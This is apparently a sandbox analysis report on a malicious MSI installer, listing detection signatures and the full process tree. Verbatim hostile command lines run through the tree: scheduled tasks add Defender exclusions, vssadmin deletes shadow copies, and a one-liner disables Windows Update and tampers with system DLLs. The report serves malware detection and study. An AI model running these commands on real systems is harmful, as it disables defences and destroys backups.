Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    02/08/2026, 16:14

General

  • Target
    install_s0up006.msi
  • Size 7.6MB
  • Sample260802-tpxtnssvcx
  • SHA256 66e8197348bfafe659d33f5851a4a47280b76dcc648f3e581ed986542a5d1033
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 3 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 26 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_s0up006.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4320
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3808
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:940
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 6795E15E2A1FB66CB8BDC7EC05F4B4EA E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:4820
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:536
  • C:\Users\Public\U9tl3z\vzalW0.exe
    C:\Users\Public\U9tl3z\vzalW0.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\U9tl3z\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\U9tl3z\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4464
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:2180
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:1136
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4048
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1868
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4332
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:4836
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:1328
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2044
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:2040
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1944
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:2792
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2908
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3492
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:2216
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1200
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5060
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:1260
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:3120
                        • C:\Program Files (x86)\grGBKT\grGBKT.exe
                          "C:\Program Files (x86)\grGBKT\grGBKT.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:3028
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3416
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\grGBKT" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3328
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\grGBKT" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1708
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2216
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3776
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\grGBKT\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4864
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\grGBKT\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:3192
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4272
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                                PID:3964
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:2352
                              • C:\Windows\SysWOW64\net.exe
                                net stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:728
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                    PID:2524
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4836
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure wuauserv reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:4232
                                • C:\Windows\SysWOW64\net.exe
                                  net stop UsoSvc
                                  4⤵
                                    PID:3912
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop UsoSvc
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4252
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config UsoSvc start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:732
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc failure UsoSvc reset= 0 actions= ""
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3416
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop uhssvc
                                    4⤵
                                      PID:4908
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop uhssvc
                                        5⤵
                                          PID:2340
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config uhssvc start= disabled
                                        4⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:2988
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc failure uhssvc reset= 0 actions= ""
                                        4⤵
                                        • Launches sc.exe
                                        PID:1240
                                      • C:\Windows\SysWOW64\net.exe
                                        net stop WaaSMedicSvc
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:992
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop WaaSMedicSvc
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3524
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config WaaSMedicSvc start= disabled
                                        4⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:1232
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc failure WaaSMedicSvc reset= 0 actions= ""
                                        4⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:4948
                                      • C:\Windows\SysWOW64\takeown.exe
                                        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4836
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:3192
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:1748
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2420
                                      • C:\Windows\SysWOW64\takeown.exe
                                        takeown /f C:\Windows\System32\wuaueng.dll
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:540
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:1384
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:3804
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:556
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2760
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4384
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4272
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        PID:260
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c echo.>c:\xxxx.ini
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:3628
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c echo.>c:\xxxx.ini
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:4808
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of WriteProcessMemory
                                      PID:3276
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1940
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                          PID:756
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Delete /TN "Task1" /F
                                          4⤵
                                            PID:2888
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • Suspicious use of WriteProcessMemory
                                          PID:4308
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:556
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1924
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5060
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:452
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2508
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3160
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                              PID:376
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                            3⤵
                                            • Indicator Removal: Clear Persistence
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of WriteProcessMemory
                                            PID:4200
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3620
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /Run /TN "Task1"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1928
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /Delete /TN "Task1" /F
                                              4⤵
                                                PID:3680
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                              3⤵
                                              • Executes a command shell one-liner
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of WriteProcessMemory
                                              PID:1236
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Program Files (x86)\grGBKT" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                • System Location Discovery: System Language Discovery
                                                PID:3336
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                              3⤵
                                              • Executes a command shell one-liner
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of WriteProcessMemory
                                              PID:1112
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Program Files (x86)\grGBKT" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                • System Location Discovery: System Language Discovery
                                                PID:3800
